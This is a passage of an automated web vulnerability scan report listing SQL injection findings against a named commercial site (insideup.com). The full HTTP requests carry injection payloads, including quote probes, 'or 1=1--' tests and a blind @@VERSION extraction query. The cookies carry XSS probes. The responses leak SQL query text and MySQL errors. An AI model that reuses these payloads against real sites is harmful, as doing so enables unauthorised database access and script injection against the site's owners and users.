OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:25:29 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=6n7evbrus4mspbcaqqrva6cq01; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/caad00/project_dynamic_page_updated.php was not found on this server.</p>

1.158. http://www.insideup.com/ppc/leadflow/caad00/project_dynamic_page_updated.php [template parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project_dynamic_page_updated.php

Issue detail

The template parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the template parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:20:11 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=spl8qorgdf1t49g6p3nokqth23; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3'' OR prj.project_page_url = 'leadflow/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00&templa' at line 5

Request 2

GET /ppc/leadflow/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3'' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:20:12 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=angbu7rln9dnsa3cnvli8kahq2; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/caad00/project_dynamic_page_updated.php was not found on this server.</p>

1.159. http://www.insideup.com/ppc/leadflow/cace00/project.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow'/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:10:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=m552rnc8tjab4rhjn0aimobba3; path=/
Content-Length: 6942
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=-1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1' at line 5

Request 2

GET /ppc/leadflow''/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:10:01 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=35mrb2de9egidm5nk49j3qcma5; path=/
Content-Length: 108
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow''/cace00/project.php was not found on this server.</p>

1.160. http://www.insideup.com/ppc/leadflow/cace00/project.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 17751795'%20or%201%3d1--%20 and 17751795'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow17751795'%20or%201%3d1--%20/cace00/project.php?catId=-80007%27OR%201=1%20AND%20ASC(MID((Now()),1,1))=1&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=1c3cvok1u33r0dee2ljf5jrgi4; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:12:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www.insideup.com/ppc/leadflow/">
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'd
...[SNIP]...

Request 2

GET /ppc/leadflow17751795'%20or%201%3d2--%20/cace00/project.php?catId=-80007%27OR%201=1%20AND%20ASC(MID((Now()),1,1))=1&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=1c3cvok1u33r0dee2ljf5jrgi4; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:12:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 125
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow17751795' or 1=2-- /cace00/project.php was not found on this server.</p>

1.161. http://www.insideup.com/ppc/leadflow/cace00/project.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00'/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:10:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=vkm7jeakpv0lbqtd8648pstjs0; path=/
Content-Length: 6942
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
